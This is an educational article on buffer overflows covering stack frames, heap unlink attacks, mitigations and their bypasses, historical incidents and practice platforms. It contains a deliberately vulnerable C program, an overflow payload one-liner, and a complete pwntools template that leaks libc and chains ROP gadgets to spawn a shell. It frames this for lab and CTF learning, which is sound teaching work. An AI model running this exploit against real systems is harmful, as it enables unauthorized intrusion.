Buffer Overflow Explained — Stack Mechanics, Exploits, and Mitigations

Buffer overflow (BOF) is the archetypal memory-safety vulnerability: a write runs past the end of an allocated buffer and corrupts the adjacent memory region. From the 1988 Morris Worm to glibc's CVE-2024-2961 in 2024, it has remained an active attack surface. This article covers stack BOF mechanics, an overview of heap BOF, the mitigation/bypass arms race, historical incidents, and legitimate practice grounds.

Why BOF is still load-bearing

It is tempting to think that this is an old problem in the age of Rust and Go, but the Microsoft Security Response Center reports that about 70% of the CVEs it assigns each year are memory-safety issues, and the Chromium project reports a similar share (around 70%) of its high-severity security bugs. The bulk of the code carrying modern infrastructure (Linux kernel, Windows internals, Chrome, Firefox, OpenSSL, FFmpeg) is still written in C/C++.

The reason BOF persists comes back to the foundational design of C/C++.

- No bounds checking on array access: neither the compiler nor the runtime stops you from writing buf[1000000]
- Classic string functions take no destination-size argument: strcpy / gets / sprintf write until the input ends, and memcpy copies whatever length the caller passes without checking it against the destination
- Pointers can point at arbitrary memory: out-of-bounds references and accesses that bypass the allocator are both possible
- Memory ownership is not tracked at compile time: the language does not statically prevent use-after-free or double-free

▸ The long migration to memory-safe languages

Rust / Go / Swift / Java / Python / Ruby / C# / JavaScript prevent these bug classes structurally, because the compiler or runtime checks every access. Rust support merging into the Linux kernel (2022 onward), Microsoft rewriting C/C++ components in Rust, and Android standardising on Rust for new native code are all consequences of this. Even so, the common expectation in the industry is that a full replacement will take 20+ years.

How a stack-based BOF works

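The stack-based buffer overflow is the original form of the bug, and it is easiest to understand by looking at a function's stack frame. What makes the attack possible is the position of the local buffer relative to the saved return address: the buffer sits at a lower address, and a write that runs past its end moves upward toward the return address.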

x86_64 Linux stack frame (high → low addresses)

Region	Role
Caller's arguments / environment	High end (e.g. 0x7fff...ff00)
★ saved RIP (return address)	Points to the next instruction in the caller = the attack target
saved RBP	Base pointer of the previous stack frame
Local variables	Small variables inside the function
char buf[64]	The 64-byte buffer allocated on the stack (low end)
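
To make the layout in the table concrete, here is a minimal Python sketch that models the frame as a flat byte array and performs an unchecked copy in the style of strcpy. The helper names (make_frame, unchecked_copy, saved_rip) and both addresses are hypothetical, and real frames also contain padding and other locals that this model leaves out.

```python
import struct

BUF_SIZE = 64  # size of char buf[64] from the table


def make_frame(saved_rbp: int, saved_rip: int) -> bytearray:
    """Low to high addresses: buf | saved RBP | saved RIP | 16 bytes of caller frame."""
    return bytearray(BUF_SIZE) + struct.pack("<QQ", saved_rbp, saved_rip) + bytes(16)


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Model of strcpy(buf, data): writes every byte plus a NUL and ignores BUF_SIZE."""
    payload = data + b"\x00"
    frame[0:len(payload)] = payload


def saved_rip(frame: bytearray) -> int:
    """Read the 8-byte return address stored above buf and the saved RBP."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]


# Both addresses are made up for illustration.
frame = make_frame(saved_rbp=0x7FFFFFFFE000, saved_rip=0x401136)
unchecked_copy(frame, b"hello")
print(hex(saved_rip(frame)))   # 0x401136: a short input leaves the return address alone
unchecked_copy(frame, b"A" * 72 + b"B" * 8)
print(hex(saved_rip(frame)))   # 0x4242424242424242: the copy ran through it
```

The only difference between the two calls is the input length, which is the whole point: nothing in the copy routine knows where buf ends.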

Classic vulnerable stack-BOF code

// vulnerable.c
#include <string.h>
#include <stdio.h>
void vulnerable(char *input) {
    char buf[64];           // 64 bytes on the stack
    strcpy(buf, input);     // ★ no size check → buf overflows past 64 bytes; bytes 72-79 land on the saved RIP
    printf("%s\n", buf);
}
int main(int argc, char **argv) {
    if (argc > 1) vulnerable(argv[1]);
    return 0;
}

Build with every mitigation off and see the segfault

$ gcc -fno-stack-protector -no-pie -z execstack -O0 vulnerable.c -o vulnerable
# distance to saved RIP = buf + saved RBP = 64 + 8 = 72 bytes
$ ./vulnerable $(python3 -c 'print("A"*72 + "BBBBBBBB")')
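Segmentation fault       # ret tries to load 0x4242424242424242 ("BBBBBBBB") into RIP; the address is non-canonical, so the fault is raised at ret with that value still at [rsp]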
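
When the frame layout is not known in advance, the 72-byte distance is usually found empirically by sending a non-repeating pattern and looking up the bytes that end up on the return address. The following is a small sketch of that idea in plain Python; pattern and offset_of are hypothetical helper names, and the crash value is simulated rather than read from a debugger.

```python
import itertools
import string


def pattern(length: int) -> bytes:
    """Build a non-repeating 'Aa0Aa1Aa2...' pattern (unique up to 20280 bytes)."""
    triples = itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    )
    needed = (length + 2) // 3
    text = "".join("".join(t) for t in itertools.islice(triples, needed))
    return text[:length].encode()


def offset_of(pat: bytes, crash_bytes: bytes) -> int:
    """Return the position of the crash bytes inside the pattern, or -1 if absent."""
    return pat.find(crash_bytes)


pat = pattern(200)
# Stand-in for the 8-byte little-endian value a debugger would show at [rsp].
crash_value = int.from_bytes(pat[72:80], "little")
print(offset_of(pat, crash_value.to_bytes(8, "little")))   # 72
```

pwntools ships a more complete version of this as cyclic; the sketch only shows why a unique pattern turns a crash value into an offset.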

What the attacker stuffs into the input

- Shellcode injection: pack shellcode (a few dozen bytes of machine code that spawn /bin/sh) into the buffer and overwrite the saved RIP with the buffer's own address. Defeated by NX (DEP)
- ret2libc: point the saved RIP at libc's system() and pass the address of /bin/sh as the argument (on x86_64 the argument travels in RDI, so a `pop rdi; ret` gadget has to run first). Hindered by ASLR unless an address leaks
- ROP (Return-Oriented Programming): chain together existing code snippets that end in ret (gadgets) to build arbitrary behaviour. The mainstream of modern BOF exploits
- JOP / SROP / COOP: relatives of ROP that chain through indirect jumps, sigreturn frames, and C++ virtual calls respectively
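
How ret can "chain" snippets is easier to see in a toy model. The sketch below is a deliberately simplified interpreter, not real machine behaviour: gadgets are Python functions keyed by made-up addresses, and each simulated ret pops the next address off a list standing in for the stack. All names and addresses are assumptions for illustration.

```python
def run_chain(stack, gadgets):
    """Toy model of ret-driven control flow: each 'ret' pops the next address."""
    regs = {"rdi": 0}
    calls = []
    stack = list(stack)                # index 0 is the top of the stack
    while stack:
        addr = stack.pop(0)            # 'ret' pops the next address into RIP
        gadget = gadgets.get(addr)
        if gadget is None:
            break                      # unmapped address: a real process would crash
        gadget(regs, stack, calls)
    return calls


def pop_rdi_ret(regs, stack, calls):
    """Models the gadget 'pop rdi; ret': the next stack word becomes the argument."""
    regs["rdi"] = stack.pop(0)


def fake_system(regs, stack, calls):
    """Models libc's system(): records the argument it was called with."""
    calls.append(("system", regs["rdi"]))


# All addresses below are made up for illustration.
GADGETS = {0x401234: pop_rdi_ret, 0x7F0000050D70: fake_system}
BINSH = 0x7F00001D8678

chain = [0x401234, BINSH, 0x7F0000050D70]
print(run_chain(chain, GADGETS))
```

The chain is pure data: three 8-byte words on the stack are enough to load an argument and reach an existing function, which is why NX alone does not stop this style of attack.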

▸ The dangerous C standard library — "do not use" for 30 years

- gets(): no size argument. Removed in C11 but still found in legacy code
- strcpy() / strcat() / sprintf(): no size argument. The strncpy family has its own pitfall: it leaves the destination without a NUL terminator when the source fills it
- scanf("%s", buf): an unsized %s is effectively gets(). For a 64-byte buffer you need %63s
- memcpy(dst, src, attacker_controlled_len): a size argument does not help if the attacker controls it
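
The strncpy pitfall in the list is easy to miss, so here is a Python model of the two behaviours, written under the assumption that the caller passes the destination size as n. These functions only imitate the C semantics on a bytearray; bounded_copy_model returns a truncation flag, whereas the real snprintf returns the length it would have written.

```python
def strncpy_model(dst: bytearray, src: bytes, n: int) -> None:
    """Model of C strncpy: copy at most n bytes, NUL-pad a short source,
    and write NO terminator when len(src) >= n."""
    assert n <= len(dst), "caller must not pass more than the destination size"
    chunk = src[:n]
    dst[:n] = chunk + b"\x00" * (n - len(chunk))


def bounded_copy_model(dst: bytearray, src: bytes) -> bool:
    """Model of snprintf(dst, sizeof dst, "%s", src): the result is always
    NUL-terminated. Returns True when the input had to be truncated."""
    room = len(dst) - 1
    chunk = src[:room]
    dst[:len(chunk) + 1] = chunk + b"\x00"
    return len(src) > room


buf = bytearray(8)
strncpy_model(buf, b"ABCDEFGHIJ", len(buf))
print(b"\x00" in buf)                     # False: full buffer, no terminator

buf = bytearray(8)
print(bounded_copy_model(buf, b"ABCDEFGHIJ"), bytes(buf))   # True b'ABCDEFG\x00'
```

An unterminated buffer is not an overflow by itself, but the next strlen or printf("%s") on it reads past the end, which is how a "safe" strncpy still ends up in bug reports.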

Heap-based BOF: targeting chunk metadata

A BOF on the heap (memory allocated with malloc() / new) rather than the stack is a heap BOF. It does not hand over the program counter as directly as a stack BOF, but by corrupting the allocator's bookkeeping metadata it can be developed into an arbitrary memory write (write-what-where).

In glibc's malloc (ptmalloc2), each chunk starts with a header [prev_size | size | data...], and free chunks in the regular bins are joined into doubly-linked lists through fd / bk pointers stored at the start of the data area. Overwriting the fd / bk pointers of an adjacent free chunk via a heap BOF lets a later unlink() write to an attacker-chosen address: the classic "unlink attack".
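
The unlink step can be sketched in a few lines of Python. This is a model under simplifying assumptions: memory is a dictionary of 8-byte words, fd and bk sit at offsets 16 and 24 of a free 64-bit chunk, and every address is made up. The checked variant mirrors the kind of integrity test later glibc versions added, not their exact code.

```python
FD_OFF, BK_OFF = 16, 24   # fd / bk follow prev_size and size in a free 64-bit chunk


def unlink_classic(mem: dict, p: int) -> None:
    """Unlink without integrity checks: two pointer writes."""
    fd, bk = mem[p + FD_OFF], mem[p + BK_OFF]
    mem[fd + BK_OFF] = bk      # FD->bk = BK
    mem[bk + FD_OFF] = fd      # BK->fd = FD


def unlink_checked(mem: dict, p: int) -> None:
    """Unlink that first verifies both neighbours still point back at p."""
    fd, bk = mem[p + FD_OFF], mem[p + BK_OFF]
    if mem.get(fd + BK_OFF) != p or mem.get(bk + FD_OFF) != p:
        raise RuntimeError("corrupted double-linked list")
    unlink_classic(mem, p)


# Made-up addresses: chunk P, the word the attacker wants to change, the new value.
P, TARGET, VALUE = 0x1000, 0x5000, 0x6000

# fd / bk as a heap overflow from the previous chunk might leave them.
mem = {P + FD_OFF: TARGET - BK_OFF, P + BK_OFF: VALUE}
unlink_classic(mem, P)
print(hex(mem[TARGET]))    # 0x6000: an attacker-chosen value at an attacker-chosen address
```

Running unlink_checked on the same corrupted chunk raises instead of writing, because neither forged neighbour points back at P.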

Modern glibc added many consistency checks to unlink(), but generation-specific techniques (House of Force, House of Spirit, fastbin dup, tcache poisoning, large bin attack, and others) keep being published. The tcache, introduced in glibc 2.26, is a particularly active area of new attacks.
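
One concrete example of such hardening, not covered in the text above, is safe-linking (glibc 2.32 and later): the next pointer of a tcache or fastbin entry is stored XORed with the address it is stored at, shifted right by 12 bits. The sketch below reproduces that arithmetic in Python; the function names and both heap addresses are hypothetical.

```python
def protect_ptr(pos: int, ptr: int) -> int:
    """Mangle ptr before storing it at address pos (safe-linking style)."""
    return (pos >> 12) ^ ptr


def reveal_ptr(pos: int, mangled: int) -> int:
    """Recover the original pointer from the value stored at address pos."""
    return (pos >> 12) ^ mangled


# Made-up heap addresses for illustration.
pos = 0x55555555B2A0          # where the next pointer is stored
nxt = 0x55555555B2F0          # the chunk it should point to

stored = protect_ptr(pos, nxt)
print(hex(stored))
print(reveal_ptr(pos, stored) == nxt)   # True
```

An attacker who overwrites the stored value with a raw target address gets it demangled into garbage, so tcache poisoning on these versions typically needs a heap address leak first. That raises the cost of the attack rather than removing it.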

Memory-safety vulnerabilities alongside heap BOF

- Use-After-Free (UAF): a pointer is used after free(); the memory may already have been reused for something else, so a write corrupts that other data
- Double Free: free() is called twice on the same pointer, which corrupts the allocator's free list
- Type Confusion: an object is treated as a different type (frequent with C++ objects and their vtables)
- Out-of-Bounds Read: Heartbleed (CVE-2014-0160) is the canonical example. Nothing is written; instead the contents of adjacent memory leak
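
The out-of-bounds read is the simplest of these to model. The sketch below imitates the shape of the Heartbleed bug, where a reply is built from a length the peer claims rather than the length actually received. It is a Python model over a bytes object; the function names and the sample secret are invented for illustration.

```python
def heartbeat_vulnerable(memory: bytes, payload_off: int, claimed_len: int) -> bytes:
    """Echo claimed_len bytes starting at the payload, trusting the peer's length."""
    return memory[payload_off:payload_off + claimed_len]


def heartbeat_fixed(memory: bytes, payload_off: int,
                    actual_len: int, claimed_len: int) -> bytes:
    """Discard the request when the claimed length exceeds what was received."""
    if claimed_len > actual_len:
        return b""
    return memory[payload_off:payload_off + claimed_len]


# A 4-byte payload followed by unrelated data that happens to sit next to it.
memory = b"bird" + b"SECRET_KEY=hunter2"

print(heartbeat_vulnerable(memory, 0, 22))    # b'birdSECRET_KEY=hunter2'
print(heartbeat_fixed(memory, 0, 4, 22))      # b''
```

No memory is corrupted and nothing crashes, which is why this class can go unnoticed for a long time.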

▸ All of these share the same root: the language doesn't check pointer validity at compile time

BOF / UAF / double free / type confusion / OOB read are all consequences of the same C/C++ design choice — neither memory ownership nor bounds are tracked by the language.

The mitigation / bypass arms race

Since BOF can't be eliminated outright, the OS, compiler, and hardware have layered mitigations on top of each other. Every mitigation has a bypass.

Mitigation	Introduced	Goal	Main bypass
Stack Canary (SSP)	1998 (StackGuard) → standardized 2000s	Place a secret value between the local buffers and the saved RBP / RIP and verify it before return	Leak the canary via info leak / take control without crossing the canary (e.g. overwrite a function pointer)
DEP / NX bit	2003-2005	Mark data regions non-executable → shellcode in buf can't run	ROP (chain existing code snippets) / ret2libc
ASLR	2001 (PaX) → mainline 2005	Randomize load addresses of stack / heap / libc / executable	info leak / partial overwrite / brute force (32-bit) / BROP
PIE	Standard from the 2010s	Randomize the main executable too	info leak the executable base / GOT overwrite
CFI / Intel CET / ARM PAC	2018-2020s	Verify indirect-call targets and ret destinations at runtime	data-only attacks that stay within CFI / COOP
Memory-Safe Languages	Rust 2015 / Go 2009 / Swift 2014	Build bounds checks into the language itself, so safe code cannot overflow a buffer	Bugs inside `unsafe` blocks / C reached via FFI
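
The first row of the table, and its bypass, can be modelled in a few lines. This Python sketch assumes a simplified frame of buf | canary | saved RBP | saved RIP and an overflow that can carry NUL bytes (as read() or memcpy() can, unlike strcpy()). The helper names and the return addresses are hypothetical.

```python
import os
import struct

BUF_SIZE = 64


def make_frame(canary: bytes, saved_rip: int) -> bytearray:
    """Low to high addresses: buf | canary | saved RBP | saved RIP."""
    return bytearray(BUF_SIZE) + canary + struct.pack("<QQ", 0, saved_rip)


def overflow(frame: bytearray, data: bytes) -> None:
    """Unchecked write starting at buf (data is assumed to fit inside the frame)."""
    frame[:len(data)] = data


def function_return(frame: bytearray, canary: bytes) -> int:
    """Epilogue check: abort if the canary changed, else return to the saved RIP."""
    if bytes(frame[BUF_SIZE:BUF_SIZE + 8]) != canary:
        raise RuntimeError("*** stack smashing detected ***")
    return struct.unpack_from("<Q", frame, BUF_SIZE + 16)[0]


# glibc-style canary: the lowest byte is NUL so string functions stop before it.
canary = b"\x00" + os.urandom(7)

blind = make_frame(canary, 0x401136)
overflow(blind, b"A" * 88)                       # clobbers the canary on the way
try:
    function_return(blind, canary)
except RuntimeError as exc:
    print(exc)

leaked = make_frame(canary, 0x401136)
overflow(leaked, b"A" * 64 + canary + b"B" * 8 + struct.pack("<Q", 0x401196))
print(hex(function_return(leaked, canary)))      # 0x401196
```

The second case is the "info leak" bypass from the table: once the canary value is known, the overflow can write it back in place and the check passes.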

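A modern binary (anything distributed by a mainstream Linux distro) typically ships with the full set: SSP + DEP + ASLR + PIE + RELRO. RELRO, which is not in the table above, makes relocation data such as the GOT read-only after startup and so blocks GOT overwrites. You can confirm with checksec.sh or pwntools' checksec; missing even one significantly lowers exploit difficulty.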

Check a binary's mitigations at a glance

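# Example output for a hardened build; the -fno-stack-protector / -no-pie / execstack build above would instead report no canary, NX disabled, and no PIE
$ checksec --file=./vulnerable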
RELRO         STACK CANARY   NX        PIE     RPATH    RUNPATH    Symbols    FORTIFY
Full RELRO    Canary found   NX enab.  PIE en. No RPATH No RUNPATH No symbols Yes
# From pwntools in Python (ELF.checksec() returns the report as a string)
$ python3 -c 'from pwn import *; print(ELF("./vulnerable", checksec=False).checksec())'
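
Part of what checksec reports can be read straight from the ELF headers. The sketch below is a rough approximation using only the standard library, assuming a little-endian ELF64 file. The function name elf64_mitigations is hypothetical. It treats any ET_DYN file as PIE (shared libraries are ET_DYN too), does not distinguish partial from full RELRO, and does not look for a stack canary, which requires symbol lookup.

```python
import struct

ET_DYN = 3                   # e_type of position-independent executables
PT_GNU_STACK = 0x6474E551    # program header describing stack permissions
PT_GNU_RELRO = 0x6474E552    # program header marking the read-only-after-relocation range
PF_X = 0x1                   # "executable" segment flag


def elf64_mitigations(data: bytes) -> dict:
    """Report PIE / NX / RELRO hints from a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)

    nx = False       # without a PT_GNU_STACK header, do not assume a non-executable stack
    relro = False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}
```

To try it on a real file, read the binary with open("./vulnerable", "rb") and pass the bytes to elf64_mitigations; for anything beyond a quick look, checksec itself remains the better tool.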

▸ "All mitigations enabled" does not equal "unexploitable"

Combine one info leak (arbitrary read) with one BOF and a modern exploit can punch through nearly any protection stack. Pwn2Own produces multiple full sandbox escapes per year across Chrome, Safari, iOS, and the Windows kernel. Mitigations raise the wall; they do not make it impassable.

Historical incidents: BOFs that changed the world

Year	Incident	Mechanism	Impact
1988	Morris Worm	Stack BOF in `fingerd`'s `gets()` + sendmail debug + rsh brute force	Took down ~10% of the Internet. The first Internet worm. Triggered the founding of CERT
1996	Aleph One "Smashing the Stack for Fun and Profit" (Phrack 49)	First textbook-level explanation of stack BOF and shellcode authoring	The starting point of modern exploitation. Still cited as a classic
2001	Code Red (CVE-2001-0500)	BOF against IIS Index Server	Infected 350,000 Windows servers; designed to DDoS the White House
2003	SQL Slammer (CVE-2002-0649)	A 376-byte UDP BOF packet against MS SQL Server 2000	Spread to 75,000 hosts in 10 minutes; congested global bandwidth; took ATMs offline
2014	Heartbleed (CVE-2014-0160)	Out-of-bounds READ in the OpenSSL TLS heartbeat	17% of HTTPS servers exposed private keys / session data / passwords
2017	WannaCry / EternalBlue (CVE-2017-0144)	Heap overflow when parsing an SMBv1 structure	200,000+ Windows machines hit with ransomware. NHS / railways / car factories halted
2024	glibc CVE-2024-2961	Out-of-bounds write in `iconv`'s ISO-2022-CN-EXT	PoC published showing how PHP filter chains develop it into RCE

▸ Memory-safety vulnerabilities did not vanish in 30 years

This fact is exactly what motivates Microsoft / Google to switch new code to Rust. The Linux kernel accepting Rust (2022), portions of the Windows kernel moving to Rust, and Android standardising on Rust for new native code are all downstream of this realization.

How to learn: legitimate practice platforms

Trying any of this on someone else's system is unauthorized access, which is a criminal offence. The right entry point is a deliberately vulnerable practice environment.

Platform	Content	Difficulty
pwn.college	Free Arizona State University course. Curriculum from stack BOF → ROP → kernel exploits	Beginner to advanced
pwnable.kr	The veteran Korean pwn site. Level-graded vulnerable binaries	Beginner to advanced
pwnable.tw	Taiwan's advanced pwn site. Strong heap / kernel exploits	Intermediate to elite
picoCTF	Beginner CTF hosted by Carnegie Mellon. PicoGym is permanently available	Beginner
HackTheBox	General challenges → Pwn category	Beginner to advanced
OverTheWire (Narnia, Behemoth, Vortex)	Classic BOF / format string wargames	Beginner to intermediate
Microcorruption	Matasano's embedded-device BOF wargame, played against an emulated MSP430 microcontroller	Beginner to intermediate
Exploit-Education (Phoenix, Nebula)	A series that raises protections step by step	Beginner to intermediate

Required tools (all included in Kali Linux)

The standard set for dynamic analysis, static analysis, and exploit development

# Dynamic analysis / debuggers
$ gdb + pwndbg / GEF / peda    # enhanced GDB (essential for modern pwn)
$ strace -f ./vulnerable        # syscall trace
$ ltrace ./vulnerable           # library-call trace
# Static analysis / binary analysis
$ checksec --file=./bin         # confirm mitigations
$ ROPgadget --binary ./bin      # enumerate ROP gadgets
$ ropper --file ./bin           # same idea, alternative implementation
$ objdump -d ./bin | less     # disassembly
$ radare2 ./bin                  # lightweight reverse engineering
$ ghidra                        # NSA's GUI decompiler
# Exploit development
$ python3 + pwntools            # de facto standard for exploit scripts
$ one_gadget ./libc.so.6        # enumerate one-shot execve('/bin/sh') addresses inside libc

A minimal pwntools exploit template

info leak → ROP chain → shell

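from pwn import *
# Assumes a practice variant of ./vulnerable that reads its input from stdin,
# built without PIE or a stack canary, with the matching libc.so.6 alongside it
elf  = context.binary = ELF("./vulnerable")
libc = ELF("./libc.so.6")
p    = process(elf.path)              # local; use remote("host", port) for remote
pad  = b"A" * 72                      # padding to saved RIP (64-byte buf + saved RBP)
# 1. info leak to get libc base: call puts(puts@got), then run main again
rop1 = ROP(elf)                       # needs a `pop rdi; ret` gadget in the binary
rop1.puts(elf.got["puts"])
rop1.raw(elf.sym["main"])
p.sendline(pad + rop1.chain())
p.recvline()                          # discard the buffer echoed by printf
leak = u64(p.recvline().rstrip(b"\n").ljust(8, b"\x00"))
libc.address = leak - libc.sym["puts"]    # rebase libc so later lookups are absolute
# 2. build the ROP chain against the rebased libc
rop2 = ROP(libc)
rop2.raw(rop2.find_gadget(["ret"]).address)   # extra ret, often needed for 16-byte stack alignment
rop2.system(next(libc.search(b"/bin/sh\x00")))
p.sendline(pad + rop2.chain())
p.interactive()                       # shell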
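
The leak-parsing step is where templates like this most often go wrong, so here it is in isolation using only the standard library. The sample bytes and the 0x80e50 offset of puts are made-up values; in practice the offset comes from the exact libc the target uses. parse_leak and libc_base are hypothetical helper names.

```python
import struct

PAGE = 0x1000


def parse_leak(line: bytes) -> int:
    """Turn the raw bytes printed by puts() into a 64-bit integer.

    puts() stops at the first NUL byte, so a 6-byte userspace address arrives
    short and has to be zero-padded to 8 bytes before unpacking.
    """
    raw = line.rstrip(b"\n")
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def libc_base(leaked_puts: int, puts_offset: int) -> int:
    """Subtract the symbol's offset and sanity-check that the base is page-aligned."""
    base = leaked_puts - puts_offset
    if base % PAGE:
        raise ValueError("base is not page-aligned: wrong libc or bad leak")
    return base


line = b"\x50\xee\xa7\xf7\xff\x7f\n"       # made-up bytes as received from the process
leak = parse_leak(line)
print(hex(leak))                           # 0x7ffff7a7ee50
print(hex(libc_base(leak, 0x80E50)))       # 0x7ffff79fe000
```

The page-alignment check is a cheap way to catch a mismatched libc before any second-stage payload is sent. Stripping only the trailing newline, rather than all whitespace, avoids eating address bytes such as 0x20 or 0x0a.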

▸ Never run this against anything outside a CTF / practice platform

Trying any of this on a real service is a crime the moment you do it. Even an internal pentest at your employer requires a written Rules of Engagement (RoE). The same legal and ethical framing as in the Kali Linux article applies here.

Summary: an honest take as of 2026

- BOF is the consequence of a 1970s language design decision: C, and later C++, does not bounds-check memory. For 30+ years it has been a primary Internet-scale attack surface
- Stack BOF (strcpy past the end → overwrite saved RIP → seize control on ret) and heap BOF (corrupt chunk metadata → write-what-where) share the same root
- Reading the history as an arms race between accumulating mitigations (SSP / DEP / ASLR / PIE / CFI) and evolving bypasses (ROP / info leak / heap grooming) gives you a map for reading modern memory-safety CVE writeups
- The real answer is rewriting in memory-safe languages. With full replacement still 20+ years away, the practical mix is:
  - Verify the mitigation stack is correctly enabled with checksec
  - Catch memory-safety bugs early with fuzzing
  - Start new projects in Rust / Go
  - For existing C/C++, prefer bounds-checked alternatives (snprintf / strncpy_s where C11 Annex K is available, which glibc does not provide / Rust wrappers)
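
As a rough illustration of the fuzzing item, the sketch below throws seeded random inputs at a toy parser with a planted length bug until one of them triggers it. Everything here is an assumption for demonstration: parse_record is an invented target, Python's IndexError stands in for a sanitizer report, and real fuzzers such as AFL++ or libFuzzer are coverage-guided rather than purely random.

```python
import random


def parse_record(data: bytes) -> bytes:
    """Toy parser with a planted bug: it trusts the length byte in the input."""
    buf = bytearray(16)
    if not data:
        return b""
    claimed = data[0]
    for i in range(claimed):
        # Raises IndexError once i reaches 16: the model's "out-of-bounds write".
        buf[i] = data[1 + i] if 1 + i < len(data) else 0
    return bytes(buf[:claimed])


def fuzz(target, rounds: int = 1000, seed: int = 0):
    """Feed random inputs to target and return the first one that crashes it."""
    rng = random.Random(seed)
    for _ in range(rounds):
        size = rng.randrange(1, 32)
        data = bytes(rng.randrange(256) for _ in range(size))
        try:
            target(data)
        except IndexError:
            return data
    return None


crash = fuzz(parse_record)
print(crash is not None and crash[0] > 16)   # True
```

For C/C++ targets the same loop is only useful when the build has a sanitizer such as AddressSanitizer enabled, since many out-of-bounds writes do not crash on their own.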